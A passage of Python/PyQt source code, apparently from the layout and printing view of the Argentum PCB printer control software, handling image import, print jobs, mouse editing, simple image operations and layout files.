r.setWidth(r.width()+2)
r.setHeight(r.height()+2)
qp.fillRect(r, QtGui.QColor(0, 54, 128))
qp.drawPixmap(image.screenRect, image.pixmap, image.pixmapRect())
if self.showingPrintHead:
image = self.printHeadImage
qp.drawPixmap(image.screenRect, image.pixmap, image.pixmapRect())
if self.argentum.printer.connected and self.argentum.printer.lightsOn:
qp.setBrush(QtGui.QColor(0xff, 0xff, 0xff))
else:
qp.setBrush(QtGui.QColor(0xc6, 0xac, 0xac))
qp.setPen(QtGui.QColor(0, 0, 0))
qp.drawRoundedRect(self.leftLightsRect, 20.0, 15.0)
qp.drawRoundedRect(self.rightLightsRect, 20.0, 15.0)
for r in self.bottomLightRects:
qp.drawRect(r)
qp.setPen(self.kerfOutlinePen)
qp.drawArc(self.leftKerfRect, 180*16, 90*16)
qp.setPen(self.kerfPen)
qp.drawArc(self.leftKerfRect, 180*16, 90*16)
qp.setPen(self.kerfOutlinePen)
qp.drawArc(self.rightKerfRect, 270*16, 90*16)
qp.setPen(self.kerfPen)
qp.drawArc(self.rightKerfRect, 270*16, 90*16)
fanImage = self.fanImage1
if self.argentum.printer.leftFanOn:
fanImage = self.fanImage
qp.drawPixmap(self.leftFanRect, fanImage, QtCore.QRectF(fanImage.rect()))
fanImage = self.fanImage1
if self.argentum.printer.rightFanOn:
fanImage = self.fanImage
qp.drawPixmap(self.rightFanRect, fanImage, QtCore.QRectF(fanImage.rect()))
qp.end()
def gerberToPixmap(self, inputFileName):
try:
f = open(inputFileName, "r")
contents = f.read()
f.close()
except:
return None
if contents[:1] != "G" and contents[:1] != '%':
return None
g = Gerber()
g.parse(contents)
if len(g.errors) > 0:
str = "Errors parsing Gerber file {}\n".format(inputFileName)
for error in g.errors:
lineno, msg = error
str = str + "{}: {}\n".format(lineno, msg)
QtGui.QMessageBox.information(self, "Invalid Gerber file", str)
return False
r = QtSvg.QSvgRenderer(QtCore.QByteArray(g.toSVG()))
print("Gerber size {} x {} {}".format(g.width, g.height, g.units))
if g.units == "inches":
pixmap = QtGui.QPixmap(g.width * 25.4 * imageScale[0],
g.height * 25.4 * imageScale[1])
else:
pixmap = QtGui.QPixmap(g.width * imageScale[0],
g.height * imageScale[1])
p = QtGui.QPainter(pixmap)
r.render(p, QtCore.QRectF(pixmap.rect()))
if pixmap.width() / imageScale[0] > 230 or pixmap.height() / imageScale[1] > 120:
QtGui.QMessageBox.information(self, "Gerber file too big", "The design provided is too big for the print area. It will be resized to fit, but this is probably not what you want.")
return pixmap
def pixmapFromHexFile(self, inputFileName):
f = open(inputFileName)
lines = f.read().split('\n')
f.close()
width = 800
height = 0
theight = 0
for line in lines:
if line.startswith('M Y -'):
h = int(line[5:])
if h > height:
height = h
elif line.startswith('M X -'):
w = int(line[5:])
width += w
elif line.startswith('M Y'):
theight += int(line[4:])
print("height={} theight={}".format(height, theight))
if height == 0:
height = theight
else:
height -= (104 * 2) * 4 # blank lines
print("{}x{}".format(width, height))
image = QtGui.QImage(width / 4, height / 4, QtGui.QImage.Format_RGB32)
image.fill(0xffffff)
p = QtGui.QPainter()
p.begin(image)
p.setFont(QtGui.QFont('arial', 80))
lotshex = "hex "
for i in range(10):
lotshex = lotshex + lotshex
p.drawText(image.rect(), QtCore.Qt.TextWordWrap, lotshex)
p.end()
return QtGui.QPixmap.fromImage(image)
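# Size-estimation notes (derived from the parsing above): width starts at
# 800 and accumulates every 'M X -<n>' move; height is the largest
# 'M Y -<n>' move (minus a blank-line correction of (104 * 2) * 4) when
# negative Y moves exist, otherwise the sum of the positive 'M Y <n>'
# moves. The placeholder preview is rendered at a quarter of that
# resolution: a hypothetical file whose X moves total 2400 and whose
# largest Y move is 4032 yields an 800 x 800 preview.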
def pixmapFromFilename(self, inputFileName):
if inputFileName.endswith(".hex"):
pixmap = self.pixmapFromHexFile(inputFileName)
try:
shutil.copy(inputFileName, self.argentum.filesDir)
except:
pass
else:
pixmap = QtGui.QPixmap(inputFileName)
if pixmap == None or pixmap.isNull():
pixmap = self.gerberToPixmap(inputFileName)
if pixmap == False:
return None
if pixmap == None or pixmap.isNull():
QtGui.QMessageBox.information(self, "Invalid image file", "Can't load image " + inputFileName)
return None
if inputFileName[-4:] == ".svg":
# Assume SVG files are in millimeters already
pixmap = pixmap.scaled(pixmap.width() * imageScale[0],
pixmap.height() * imageScale[1])
r = QtSvg.QSvgRenderer(inputFileName)
p = QtGui.QPainter(pixmap)
r.render(p, QtCore.QRectF(pixmap.rect()))
return pixmap
def addImageFile(self, inputFileName):
pixmap = self.pixmapFromFilename(inputFileName)
pi = PrintImage(pixmap, inputFileName)
self.images.append(pi)
self.ensureImageInPrintLims(pi)
self.update()
self.imageList.update()
self.layoutChanged = True
return pi
def isImageProcessed(self, image):
hexFilename = os.path.join(self.argentum.filesDir, image.hexFilename)
if not os.path.exists(hexFilename):
return False
if os.path.getsize(hexFilename) == 0:
return False
hexModified = os.path.getmtime(hexFilename)
if time.time() - hexModified > 7*24*60*60:
return False
last_printer_options_changed = self.argentum.getOption("last_printer_options_changed", None)
if last_printer_options_changed != None and hexModified < last_printer_options_changed:
return False
imgModified = os.path.getmtime(image.filename)
if imgModified < hexModified:
if image.lastResized:
return image.lastResized < hexModified
return True
return False
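# Staleness rules, summarized: a cached .hex is reused only if it exists,
# is non-empty, is younger than a week, postdates the last change to the
# printer options, and postdates the source image's last modification (or
# last resize, when the image has been resized in the layout).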
def imageProgress(self, y, max_y):
if self.printCanceled:
return False
percent = (y * 100.0 / max_y)
if percent > 99:
percent = 99
self.setProgress(percent=percent)
return True
def sendProgress(self, pos, size):
if self.printPaused:
return "Pause"
if self.printCanceled:
return False
self.setProgress(percent=(20 + self.perImage * pos / size))
return True
def processImage(self, image):
if image.filename.endswith(".hex"):
return
ip = self.argentum.getImageProcessor()
hexFilename = os.path.join(self.argentum.filesDir, image.hexFilename)
try:
size = None
if image.lastResized != None:
width = image.width * imageScale[0]
height = image.height * imageScale[1]
size = (int(width), int(height))
print("resizing {} to {},{}.".format(hexFilename, size[0], size[1]))
print("original size {},{}.".format(image.pixmap.width(), image.pixmap.height()))
image.hexFilename = "{}-{}x{}.hex".format(
image.hexFilename[:-4], size[0], size[1])
hexFilename = os.path.join(self.argentum.filesDir,
image.hexFilename)
self.layoutChanged = True
ip.sliceImage(image.pixmap.toImage(), hexFilename,
progressFunc=self.imageProgress,
size=size)
except Exception as e:
print("error processing {}: {}.".format(image.filename, e))
self.setProgress(labelText="Error processing {}.".format(image.filename))
print("removing {}.".format(hexFilename))
os.remove(hexFilename)
raise
curPercent = 0
percent = None
labelText = None
statusText = None
missing = None
printCanceled = False
printPaused = False
def setProgress(self, percent=None,
incPercent=None,
labelText=None,
statusText=None,
missing=None,
canceled=None):
if self.printCanceled:
raise PrintCanceledException()
if percent:
self.percent = percent
self.curPercent = percent
if incPercent:
self.curPercent = self.curPercent + incPercent
self.percent = self.curPercent
if labelText:
self.labelText = labelText
if statusText:
self.statusText = statusText
if missing:
canceled = True
self.missing = missing
if canceled:
self.printCanceled = canceled
def reportMissing(self, missing):
# I swear on Poseidon's trident, one day I shall remove the need
# for this Sneaker Net bullshit
msgbox = QtGui.QMessageBox()
msgbox.setWindowTitle("Sneaker Net Required.")
msgbox.setText("One or more files are missing from, or different on the printer.")
msgbox.setDetailedText('\n'.join(missing))
msgbox.exec_()
def progressUpdater(self):
QtCore.QTimer.singleShot(100, self.progressUpdater)
if self.percent:
self.progress.setValue(self.percent)
if self.percent == 20:
self.update()
self.percent = None
if self.labelText:
self.progress.setLabelText(self.labelText)
self.labelText = None
if self.statusText:
self.argentum.statusBar().showMessage(self.statusText)
self.statusText = None
if self.progress.wasCanceled() or self.printCanceled:
if not self.printCanceled:
self.argentum.printer.stop()
if self.progress.wasCanceled():
self.argentum.statusBar().showMessage("Print canceled.")
self.printCanceled = True
self.progress.hide()
self.printPaused = self.progress.paused
if self.missing:
missing = self.missing
self.missing = None
self.reportMissing(missing)
def fanAnimator(self):
QtCore.QTimer.singleShot(1000 / self.fanSpeed, self.fanAnimator)
if self.argentum.printer.leftFanOn or self.argentum.printer.rightFanOn:
if self.fanImage == self.fanImage1:
self.fanImage = self.fanImage2
else:
self.fanImage = self.fanImage1
self.update()
def printCross(self, x, y):
pos = self.printAreaToMove(x, y)
self.argentum.printer.move(pos[0], pos[1], wait=True)
self.argentum.printer.Print("cross.hex", wait=True)
def printCrossPattern(self, x, y):
self.setProgress(labelText="Printing cross pattern...")
self.printCross(x+ 0, y+ 0)
self.setProgress(percent=20)
self.printCross(x+10, y+ 0)
self.setProgress(percent=40)
self.printCross(x+20, y+ 0)
self.setProgress(percent=60)
self.printCross(x+10, y+10)
self.setProgress(percent=80)
self.printCross(x+10, y+20)
self.setProgress(percent=100)
def startPrint(self):
if len(self.images) == 1:
QtGui.QMessageBox.information(self,
"Nothing to print",
"You can add images to the print view by selecting\nFile -> Import Image or by simply dragging and dropping images onto the layout. All standard image file formats are supported, as well as industry standard Gerber files. You can also cut and paste from any graphics editing program.")
return
if self.printThread != None:
print("Already printing!")
return
options = PrintOptionsDialog(self)
if options.exec_() == options.Rejected:
return
self.printCanceled = False
self.progress = PrintProgressDialog(self)
self.progress.setWindowTitle("Printing")
self.progress.setLabelText("Starting up...")
self.progress.setValue(0)
self.progress.show()
self.printThread = threading.Thread(target=self.printLoop)
self.printThread.passes = options.getPasses()
self.printThread.useRollers = options.getUseRollers()
self.printThread.alsoPause = options.getAlsoPause()
self.printThread.dryingOnly = False
self.printThread.start()
def printLoop(self):
try:
self.setProgress(statusText="Printing.")
processingStart = time.time()
self.setProgress(labelText="Processing images...")
self.perImage = 20.0 / (len(self.images) - 1)
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
if not self.isImageProcessed(image):
self.setProgress(labelText="Processing image {}.".format(os.path.basename(image.filename)))
self.processImage(image)
else:
print("Skipping processing of image {}.".format(image.filename))
self.setProgress(incPercent=self.perImage)
processingEnd = time.time()
self.argentum.addTimeSpentProcessingImages(processingEnd - processingStart)
if not self.argentum.printer.connected:
self.setProgress(labelText="Printer isn't connected.", statusText="Print aborted. Connect your printer.", canceled=True)
return
if (self.argentum.printer.version == None or
(self.argentum.printer.majorVersion == 0 and
self.argentum.printer.minorVersion < 15)):
self.setProgress(labelText="Printer firmware too old.", statusText="Print aborted. Printer firmware needs upgrade.", canceled=True)
return
self.argentum.printer.monitorEnabled = False
volts = self.argentum.printer.volt()
if volts < 5:
self.setProgress(labelText="Please turn on your printer.")
while volts < 5:
time.sleep(1)
volts = self.argentum.printer.volt()
self.setProgress(percent=20, labelText="Starting print.")
self.argentum.printer.turnLightsOn()
self.argentum.printer.command("l E", expect='rollers')
self.argentum.printer.command("l r", expect='rollers')
time.sleep(1.5)
self.argentum.printer.command("l e", expect='rollers')
self.argentum.printer.turnMotorsOn()
self.argentum.setSpeed()
self.argentum.printer.home(wait=True)
# Now we can actually print!
printingStart = time.time()
for i in range(0, self.printThread.passes):
self.setProgress(percent=20, labelText="Starting pass {}".format(i+1))
self.perImage = 79.0 / (len(self.images) - 1)
nImage = 0
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
while self.progress.paused:
time.sleep(0.5)
if self.printCanceled:
raise PrintCanceledException()
pos = self.printAreaToMove(image.left + image.width, image.bottom)
if image.filename.endswith(".hex"):
pos = (pos[0] - 15 * 80, pos[1] + 560 + 25 * 80)
self.argentum.printer.moveTo(pos[0], pos[1], withOk=True)
response = self.argentum.printer.waitForResponse(timeout=10, expect='Ok')
if response:
response = ''.join(response)
if response.find('/') != -1:
self.setProgress(statusText="Print error - ensure images are within print limits.", canceled=True)
return
self.setProgress(labelText="Pass {}: {}".format(i + 1, image.hexFilename))
path = os.path.join(self.argentum.filesDir, image.hexFilename)
while self.progress.paused:
time.sleep(0.5)
if self.printCanceled:
raise PrintCanceledException()
if not self.argentum.printer.send(path, progressFunc=self.sendProgress, printOnline=True):
self.setProgress(labelText="Printer error.", canceled=True)
return
nImage = nImage + 1
self.setProgress(percent=(20 + self.perImage * nImage))
printingEnd = time.time()
print("printed in {} s".format(printingEnd - printingStart))
self.argentum.addTimeSpentPrinting(printingEnd - printingStart)
printingStart = time.time()
if self.printThread.useRollers:
self.dryingLoop()
if self.printThread.alsoPause:
self.setProgress(labelText="Pausing before next pass.")
if not self.progress.paused:
self.progress.pause()
self.argentum.printer.moveTo(100, 100, withOk=True)
self.argentum.printer.waitForResponse(timeout=10, expect='Ok')
while self.progress.paused:
time.sleep(0.5)
if self.printCanceled:
raise PrintCanceledException()
printingEnd = time.time()
self.argentum.addTimeSpentPrinting(printingEnd - printingStart)
printingStart = time.time()
self.argentum.printer.home()
self.setProgress(statusText='Print complete.', percent=100)
printingEnd = time.time()
self.argentum.addTimeSpentPrinting(printingEnd - printingStart)
except PrintCanceledException:
pass
except Exception as e:
print(e)
self.setProgress(statusText="Print error.", canceled=True)
raise
finally:
self.printThread = None
self.argentum.printingCompleted = True
self.argentum.printer.monitorEnabled = True
def movePrintHead(self):
xmm = self.printHeadImage.left - self.printHeadImage.minLeft
ymm = self.printHeadImage.bottom - self.printHeadImage.minBottom
self.argentum.printer.moveTo(xmm * 80, ymm * 80)
def inTrashCan(self, image):
if image == None:
return False
if image.screenRect == None:
image.screenRect = self.printAreaToScreen(image)
return self.trashCanRect.intersects(image.screenRect)
def mousePressEvent(self, event):
if event.modifiers() == QtCore.Qt.NoModifier:
self.selection = None
self.selection2 = None
else:
self.selection2 = None
p = self.screenToPrintArea(event.pos().x(), event.pos().y())
if p == None:
return
px = p[0]
py = p[1]
for image in reversed(self.images):
if image == self.printHeadImage:
continue
if not image.visible:
continue
if py >= image.bottom and py < image.bottom + image.height:
if px >= image.left and px < image.left + image.width:
if event.modifiers() == QtCore.Qt.NoModifier:
self.selection = image
else:
if self.selection == None:
self.selection = image
else:
self.selection2 = image
break
def mouseReleaseEvent(self, event):
if self.dragging:
if self.dragging == self.printHeadImage:
self.movePrintHead()
else:
if self.inTrashCan(self.dragging):
self.images.remove(self.dragging)
self.layoutChanged = True
else:
self.ensureImageInPrintLims(self.dragging)
self.dragging.screenRect = None
self.layoutChanged = True
elif self.resizing:
self.ensureImageInPrintLims(self.resizing)
self.resizing.screenRect = None
self.layoutChanged = True
else:
lights = False
if self.leftLightsRect.contains(event.pos()):
lights = True
if self.rightLightsRect.contains(event.pos()):
lights = True
for light in self.bottomLightRects:
if light.contains(event.pos()):
lights = True
if lights:
if self.argentum.printer.lightsOn:
self.argentum.printer.turnLightsOff()
else:
self.argentum.printer.turnLightsOn()
if self.leftFanRect.contains(event.pos()):
if self.argentum.printer.leftFanOn:
self.argentum.printer.turnLeftFanOff()
else:
self.argentum.printer.turnLeftFanOn()
if self.rightFanRect.contains(event.pos()):
if self.argentum.printer.rightFanOn:
self.argentum.printer.turnRightFanOff()
else:
self.argentum.printer.turnRightFanOn()
kerf = False
if self.leftKerfRect.contains(event.pos()):
kerf = True
if self.rightKerfRect.contains(event.pos()):
kerf = True
if kerf:
if self.colorPicker.isVisible():
self.colorPicker.hide()
else:
self.colorPicker.show()
if self.dragging and self.dragging != self.printHeadImage:
self.selection = self.dragging
elif self.resizing:
self.selection = self.resizing
self.dragging = None
self.resizing = None
self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.update()
def colorPicked(self, color):
self.argentum.printer.command("red {}".format(color.red()))
self.argentum.printer.command("green {}".format(color.green()))
self.argentum.printer.command("blue {}".format(color.blue()))
self.kerfPen.setColor(color)
self.update()
def ensureImageInPrintLims(self, image):
if image == self.printHeadImage:
if image.left < image.minLeft:
image.left = image.minLeft
if image.bottom < image.minBottom:
image.bottom = image.minBottom
return
if image.left < self.printLims.left:
image.left = self.printLims.left
if image.bottom < self.printLims.bottom:
image.bottom = self.printLims.bottom
if image.left + image.width > self.printLims.left + self.printLims.width:
image.left = (self.printLims.left +
self.printLims.width - image.width)
if image.bottom + image.height > self.printLims.bottom + self.printLims.height:
image.bottom = (self.printLims.bottom +
self.printLims.height - image.height)
if image.left < self.printLims.left:
image.left = self.printLims.left
image.width = self.printLims.width
if image.bottom < self.printLims.bottom:
image.bottom = self.printLims.bottom
image.height = self.printLims.height
def mouseMoveEvent(self, event):
pressed = event.buttons() & QtCore.Qt.LeftButton
p = self.screenToPrintArea(event.pos().x(), event.pos().y())
if p == None:
if self.dragging == None and self.resizing == None:
self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
return
self.showTrashCanOpen = self.inTrashCan(self.dragging)
px = p[0]
py = p[1]
#print("{}, {}".format(px, py))
if pressed and self.dragging != None:
image = self.dragging
image.left = px - self.dragStart[0] + self.dragImageStart[0]
image.bottom = py - self.dragStart[1] + self.dragImageStart[1]
image.screenRect = None
self.layoutChanged = True
self.update()
elif pressed and self.resizing != None:
image = self.resizing
(leftEdge, rightEdge, topEdge, bottomEdge) = self.resizeEdges
(startLeft, startBottom, startWidth, startHeight) = self.resizeImageStart
dx = px - self.resizeStart[0]
dy = py - self.resizeStart[1]
if leftEdge:
if dx + startLeft < startLeft + startWidth:
image.left = dx + startLeft
image.width = startWidth + startLeft - image.left
elif rightEdge:
if dx + startWidth > 0:
image.width = dx + startWidth
if topEdge:
if dy + startHeight > 0:
image.height = dy + startHeight
elif bottomEdge:
if dy + startBottom < startBottom + startHeight:
image.bottom = dy + startBottom
image.height = startHeight + startBottom - image.bottom
image.lastResized = time.time()
image.screenRect = None
self.layoutChanged = True
self.update()
elif self.dragging == None and self.resizing == None:
hit = False
for image in reversed(self.images):
if image == self.printHeadImage and not self.showingPrintHead:
continue
if not image.visible:
continue
leftEdge = False
rightEdge = False
topEdge = False
bottomEdge = False
n = 1.1 if pressed else 1.0
if (py >= image.bottom - n and
py < image.bottom + image.height + n):
if px >= image.left - n and px <= image.left:
leftEdge = True
if (px < image.left + image.width + n and
px >= image.left + image.width):
rightEdge = True
if (px >= image.left - n and
px < image.left + image.width + n):
if py >= image.bottom - n and py <= image.bottom:
bottomEdge = True
if (py < image.bottom + image.height + n and
py >= image.bottom + image.height):
topEdge = True
anyEdge = True
if leftEdge and bottomEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeBDiagCursor))
elif rightEdge and topEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeBDiagCursor))
elif leftEdge and topEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor))
elif rightEdge and bottomEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor))
elif leftEdge or rightEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeHorCursor))
elif topEdge or bottomEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeVerCursor))
else:
anyEdge = False
if image == self.printHeadImage or image.filename.endswith(".hex"):
anyEdge = False
if anyEdge:
hit = True
if pressed:
self.resizing = image
self.resizeImageStart = (image.left, image.bottom, image.width, image.height)
self.resizeStart = (px, py)
self.resizeEdges = (leftEdge, rightEdge, topEdge, bottomEdge)
break
if px >= image.left and px < image.left + image.width:
if py >= image.bottom and py < image.bottom + image.height:
hit = True
if pressed:
self.dragging = image
self.dragImageStart = (image.left, image.bottom)
self.dragStart = (px, py)
self.setCursor(QtGui.QCursor(QtCore.Qt.ClosedHandCursor))
else:
self.setCursor(QtGui.QCursor(QtCore.Qt.OpenHandCursor))
break
if not hit:
self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
def dragEnterEvent(self, e):
self.argentum.raise_()
self.argentum.activateWindow()
e.accept()
def dropEvent(self, e):
if e.mimeData().hasUrls():
url = str(e.mimeData().urls()[0].path())
pi = self.addDroppedFile(url, e.pos())
if pi:
self.selection = pi
def addDroppedFile(self, path, pos=None):
if path[0] == '/' and path[2] == ':':
# Windows
path = path[1:]
if path[-7:] == ".layout":
self.openLayout(path)
return None
pi = self.addImageFile(path)
if pi == None:
return None
if pos:
p = self.screenToPrintArea(pos.x(), pos.y())
else:
p = (self.printLims.left + self.printLims.width / 2,
self.printLims.bottom + self.printLims.height / 2)
if p != None:
pi.left = p[0] - pi.width / 2
pi.bottom = p[1] - pi.height / 2
self.ensureImageInPrintLims(pi)
return pi
def copy(self):
if self.selection == None:
print("nothing to copy")
return
clipboard = QtGui.QApplication.clipboard()
clipboard.setPixmap(self.selection.pixmap)
def cut(self):
if self.selection == None:
print("nothing to cut")
return
self.copy()
self.images.remove(self.selection)
self.layoutChanged = True
self.update()
def delete(self):
if self.selection == None:
print("nothing to delete")
return
self.images.remove(self.selection)
self.layoutChanged = True
self.update()
def paste(self):
clipboard = QtGui.QApplication.clipboard()
if clipboard.mimeData().hasUrls():
url = str(clipboard.mimeData().urls()[0].path())
pi = self.addDroppedFile(url)
if pi != None:
self.selection = pi
return
if clipboard.mimeData().hasImage():
image = clipboard.mimeData().imageData().toPyObject()
fname = tempfile.mktemp() + ".png"
print("using temp file " + fname)
image.save(fname)
pi = self.addDroppedFile(fname)
if pi != None:
self.selection = pi
return
def crop(self):
if self.selection == None:
print("nothing to crop")
return
image = self.selection.pixmap.toImage()
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Cropping...")
progress.show()
total = image.height() * 2 + image.width() * 2
sofar = 0
nTop = 0
for j in range(0, image.height()):
rowIsEmpty = True
for i in range(0, image.width()):
blue = QtGui.qBlue(image.pixel(i, j))
if blue <= 200:
rowIsEmpty = False
break
if rowIsEmpty:
nTop = nTop + 1
else:
break
progress.setValue((sofar+j+1) * 100.0 / total)
QtGui.QApplication.processEvents()
sofar = image.height()
nWidth = image.width()
for i in range(0, image.width()):
colIsEmpty = True
for j in range(0, image.height()):
blue = QtGui.qBlue(image.pixel(image.width() - i - 1, j))
if blue <= 200:
colIsEmpty = False
break
if colIsEmpty:
nWidth = nWidth - 1
else:
break
progress.setValue((sofar+i+1) * 100.0 / total)
QtGui.QApplication.processEvents()
sofar += image.width()
nLeft = 0
for i in range(0, image.width()):
colIsEmpty = True
for j in range(0, image.height()):
blue = QtGui.qBlue(image.pixel(i, j))
if blue <= 200:
colIsEmpty = False
break
if colIsEmpty:
nLeft = nLeft + 1
else:
break
progress.setValue((sofar+i+1) * 100.0 / total)
QtGui.QApplication.processEvents()
sofar += image.width()
nHeight = image.height()
for j in range(0, image.height()):
rowIsEmpty = True
for i in range(0, image.width()):
blue = QtGui.qBlue(image.pixel(i, image.height() - j - 1))
if blue <= 200:
rowIsEmpty = False
break
if rowIsEmpty:
nHeight = nHeight - 1
else:
break
progress.setValue((sofar+j+1) * 100.0 / total)
QtGui.QApplication.processEvents()
progress.setValue(99.0)
QtGui.QApplication.processEvents()
nBottom = image.height() - nHeight
image = image.copy(nLeft, nTop, nWidth - nLeft, nHeight - nTop)
fname = tempfile.mktemp() + ".png"
print("using temp file " + fname)
image.save(fname)
progress.setValue(100.0)
QtGui.QApplication.processEvents()
self.images.remove(self.selection)
newImage = self.addImageFile(fname)
newImage.left = self.selection.left + nLeft / imageScale[0]
newImage.bottom = self.selection.bottom + nBottom / imageScale[1]
newImage.screenRect = None
self.layoutChanged = True
self.update()
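# The crop above edge-scans for the bounding box of "ink" (pixels whose
# blue channel is <= 200). An equivalent one-pass sketch on a plain 2D
# array of blue values (hypothetical helper, shown for illustration only):
#
#   def bounding_box(rows):
#       ink = [(i, j) for j, row in enumerate(rows)
#              for i, blue in enumerate(row) if blue <= 200]
#       if not ink:
#           return None  # nothing to crop
#       xs = [i for i, _ in ink]
#       ys = [j for _, j in ink]
#       return min(xs), min(ys), max(xs) + 1, max(ys) + 1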
def erode(self):
if self.selection == None:
print("nothing to erode")
return
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Eroding...")
progress.show()
image = self.selection.pixmap.toImage()
newImage = image.copy()
for j in range(image.height()):
for i in range(image.width()):
newImage.setPixel(i, j, 0xffffff)
for j in range(image.height()):
for i in range(image.width()):
if i == 0 or j == 0:
continue
if i+1 == image.width() or j+1 == image.height():
continue
if QtGui.qBlue(image.pixel(i , j )) > 200:
continue
if QtGui.qBlue(image.pixel(i-1, j-1)) > 200:
continue
if QtGui.qBlue(image.pixel(i-1, j )) > 200:
continue
if QtGui.qBlue(image.pixel(i-1, j+1)) > 200:
continue
if QtGui.qBlue(image.pixel(i+1, j-1)) > 200:
continue
if QtGui.qBlue(image.pixel(i+1, j )) > 200:
continue
if QtGui.qBlue(image.pixel(i+1, j+1)) > 200:
continue
if QtGui.qBlue(image.pixel(i , j-1)) > 200:
continue
if QtGui.qBlue(image.pixel(i , j+1)) > 200:
continue
newImage.setPixel(i, j, 0)
progress.setValue((j+1) * 100.0 / image.height())
QtGui.QApplication.processEvents()
self.selection.pixmap = QtGui.QPixmap.fromImage(newImage)
self.update()
def dilate(self):
if self.selection == None:
print("nothing to dilate")
return
image = self.selection.pixmap.toImage()
newImage = image.copy()
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Dilating...")
progress.show()
for j in range(image.height()):
for i in range(image.width()):
if QtGui.qBlue(image.pixel(i, j)) <= 200:
continue
if i == 0:
pass
elif i == image.width()-1:
pass
elif j == 0:
pass
elif j == image.height()-1:
pass
else:
if QtGui.qBlue(image.pixel(i-1, j-1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i-1, j )) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i-1, j+1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i+1, j-1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i+1, j )) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i+1, j+1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i , j-1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i , j+1)) <= 200:
newImage.setPixel(i, j, 0)
continue
progress.setValue((j+1) * 100.0 / image.height())
QtGui.QApplication.processEvents()
self.selection.pixmap = QtGui.QPixmap.fromImage(newImage)
self.update()
def invert(self):
if self.selection == None:
print("nothing to invert")
return
image = self.selection.pixmap.toImage()
newImage = image.copy()
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Inverting...")
progress.show()
for j in range(image.height()):
for i in range(image.width()):
if QtGui.qBlue(image.pixel(i, j)) <= 200:
newImage.setPixel(i, j, 0xffffff)
else:
newImage.setPixel(i, j, 0)
progress.setValue((j+1) * 100.0 / image.height())
QtGui.QApplication.processEvents()
self.selection.pixmap = QtGui.QPixmap.fromImage(newImage)
self.update()
def alignLefts(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.left = self.selection.left
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def alignRights(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.left = self.selection.left + self.selection.width - self.selection2.width
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def alignTops(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.bottom = self.selection.bottom + self.selection.height - self.selection2.height
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def alignBottoms(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.bottom = self.selection.bottom
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def openLayout(self, filename=None):
if self.closeLayout() == False:
return
if filename == None:
filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Select a layout', self.argentum.filesDir, "Layouts (*.layout)"))
# getOpenFileName returns an empty string on cancel, so test for emptiness.
if not filename:
return
file = open(filename, "r")
lines = file.read().split('\n')
file.close()
layoutPath = os.path.dirname(filename)
bImageSection = False
image = None
for line in lines:
if len(line) == 0:
continue
if line[0] == '#':
continue
if line[0] == '[':
bImageSection = False
if line == '[image]':
bImageSection = True
continue
if line.find('=') == -1:
# What is this?
continue
key = line[0:line.find('=')]
value = line[line.find('=')+1:]
if bImageSection:
if key == "filename":
if image:
self.ensureImageInPrintLims(image)
filename = value
if not os.path.isabs(filename):
filename = os.path.join(layoutPath, filename)
image = self.addImageFile(filename)
if image:
if key == "left":
image.left = float(value)
if key == "bottom":
image.bottom = float(value)
if key == "width":
image.width = float(value)
if key == "height":
image.height = float(value)
if key == "lastResized":
image.lastResized = float(value)
if image:
self.ensureImageInPrintLims(image)
self.layout = filename
self.update()
def saveLayout(self, filename=None):
if self.layout == None:
if filename == None:
filename = str(QtGui.QFileDialog.getSaveFileName(self, 'Save layout as', self.argentum.filesDir, "Layouts (*.layout)"))
# getSaveFileName returns an empty string on cancel, so test for emptiness.
if not filename:
return False
if filename.find('.layout') != len(filename)-7:
filename = filename + '.layout'
else:
filename = self.layout
# TODO we really need to create an archive of the control file
# and all the images used
#
# XXX Saves full pathnames. :(
file = open(filename, "w")
layoutPath = os.path.dirname(filename)
for image in self.images:
if image == self.printHeadImage:
continue
file.write('[image]\n')
path = os.path.relpath(image.filename, layoutPath)
if path.find('..') != -1:
path = image.filename
file.write('filename={}\n'.format(path))
file.write('left={}\n'.format(image.left))
file.write('bottom={}\n'.format(image.bottom))
file.write('width={}\n'.format(image.width))
file.write('height={}\n'.format(image.height))
if image.lastResized:
file.write('lastResized={}\n'.format(image.lastResized))
file.write('\n')
file.close()
self.layout = filename
self.layoutChanged = False
self.update()
return True
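# A .layout file is a simple INI-like text format; keys match what
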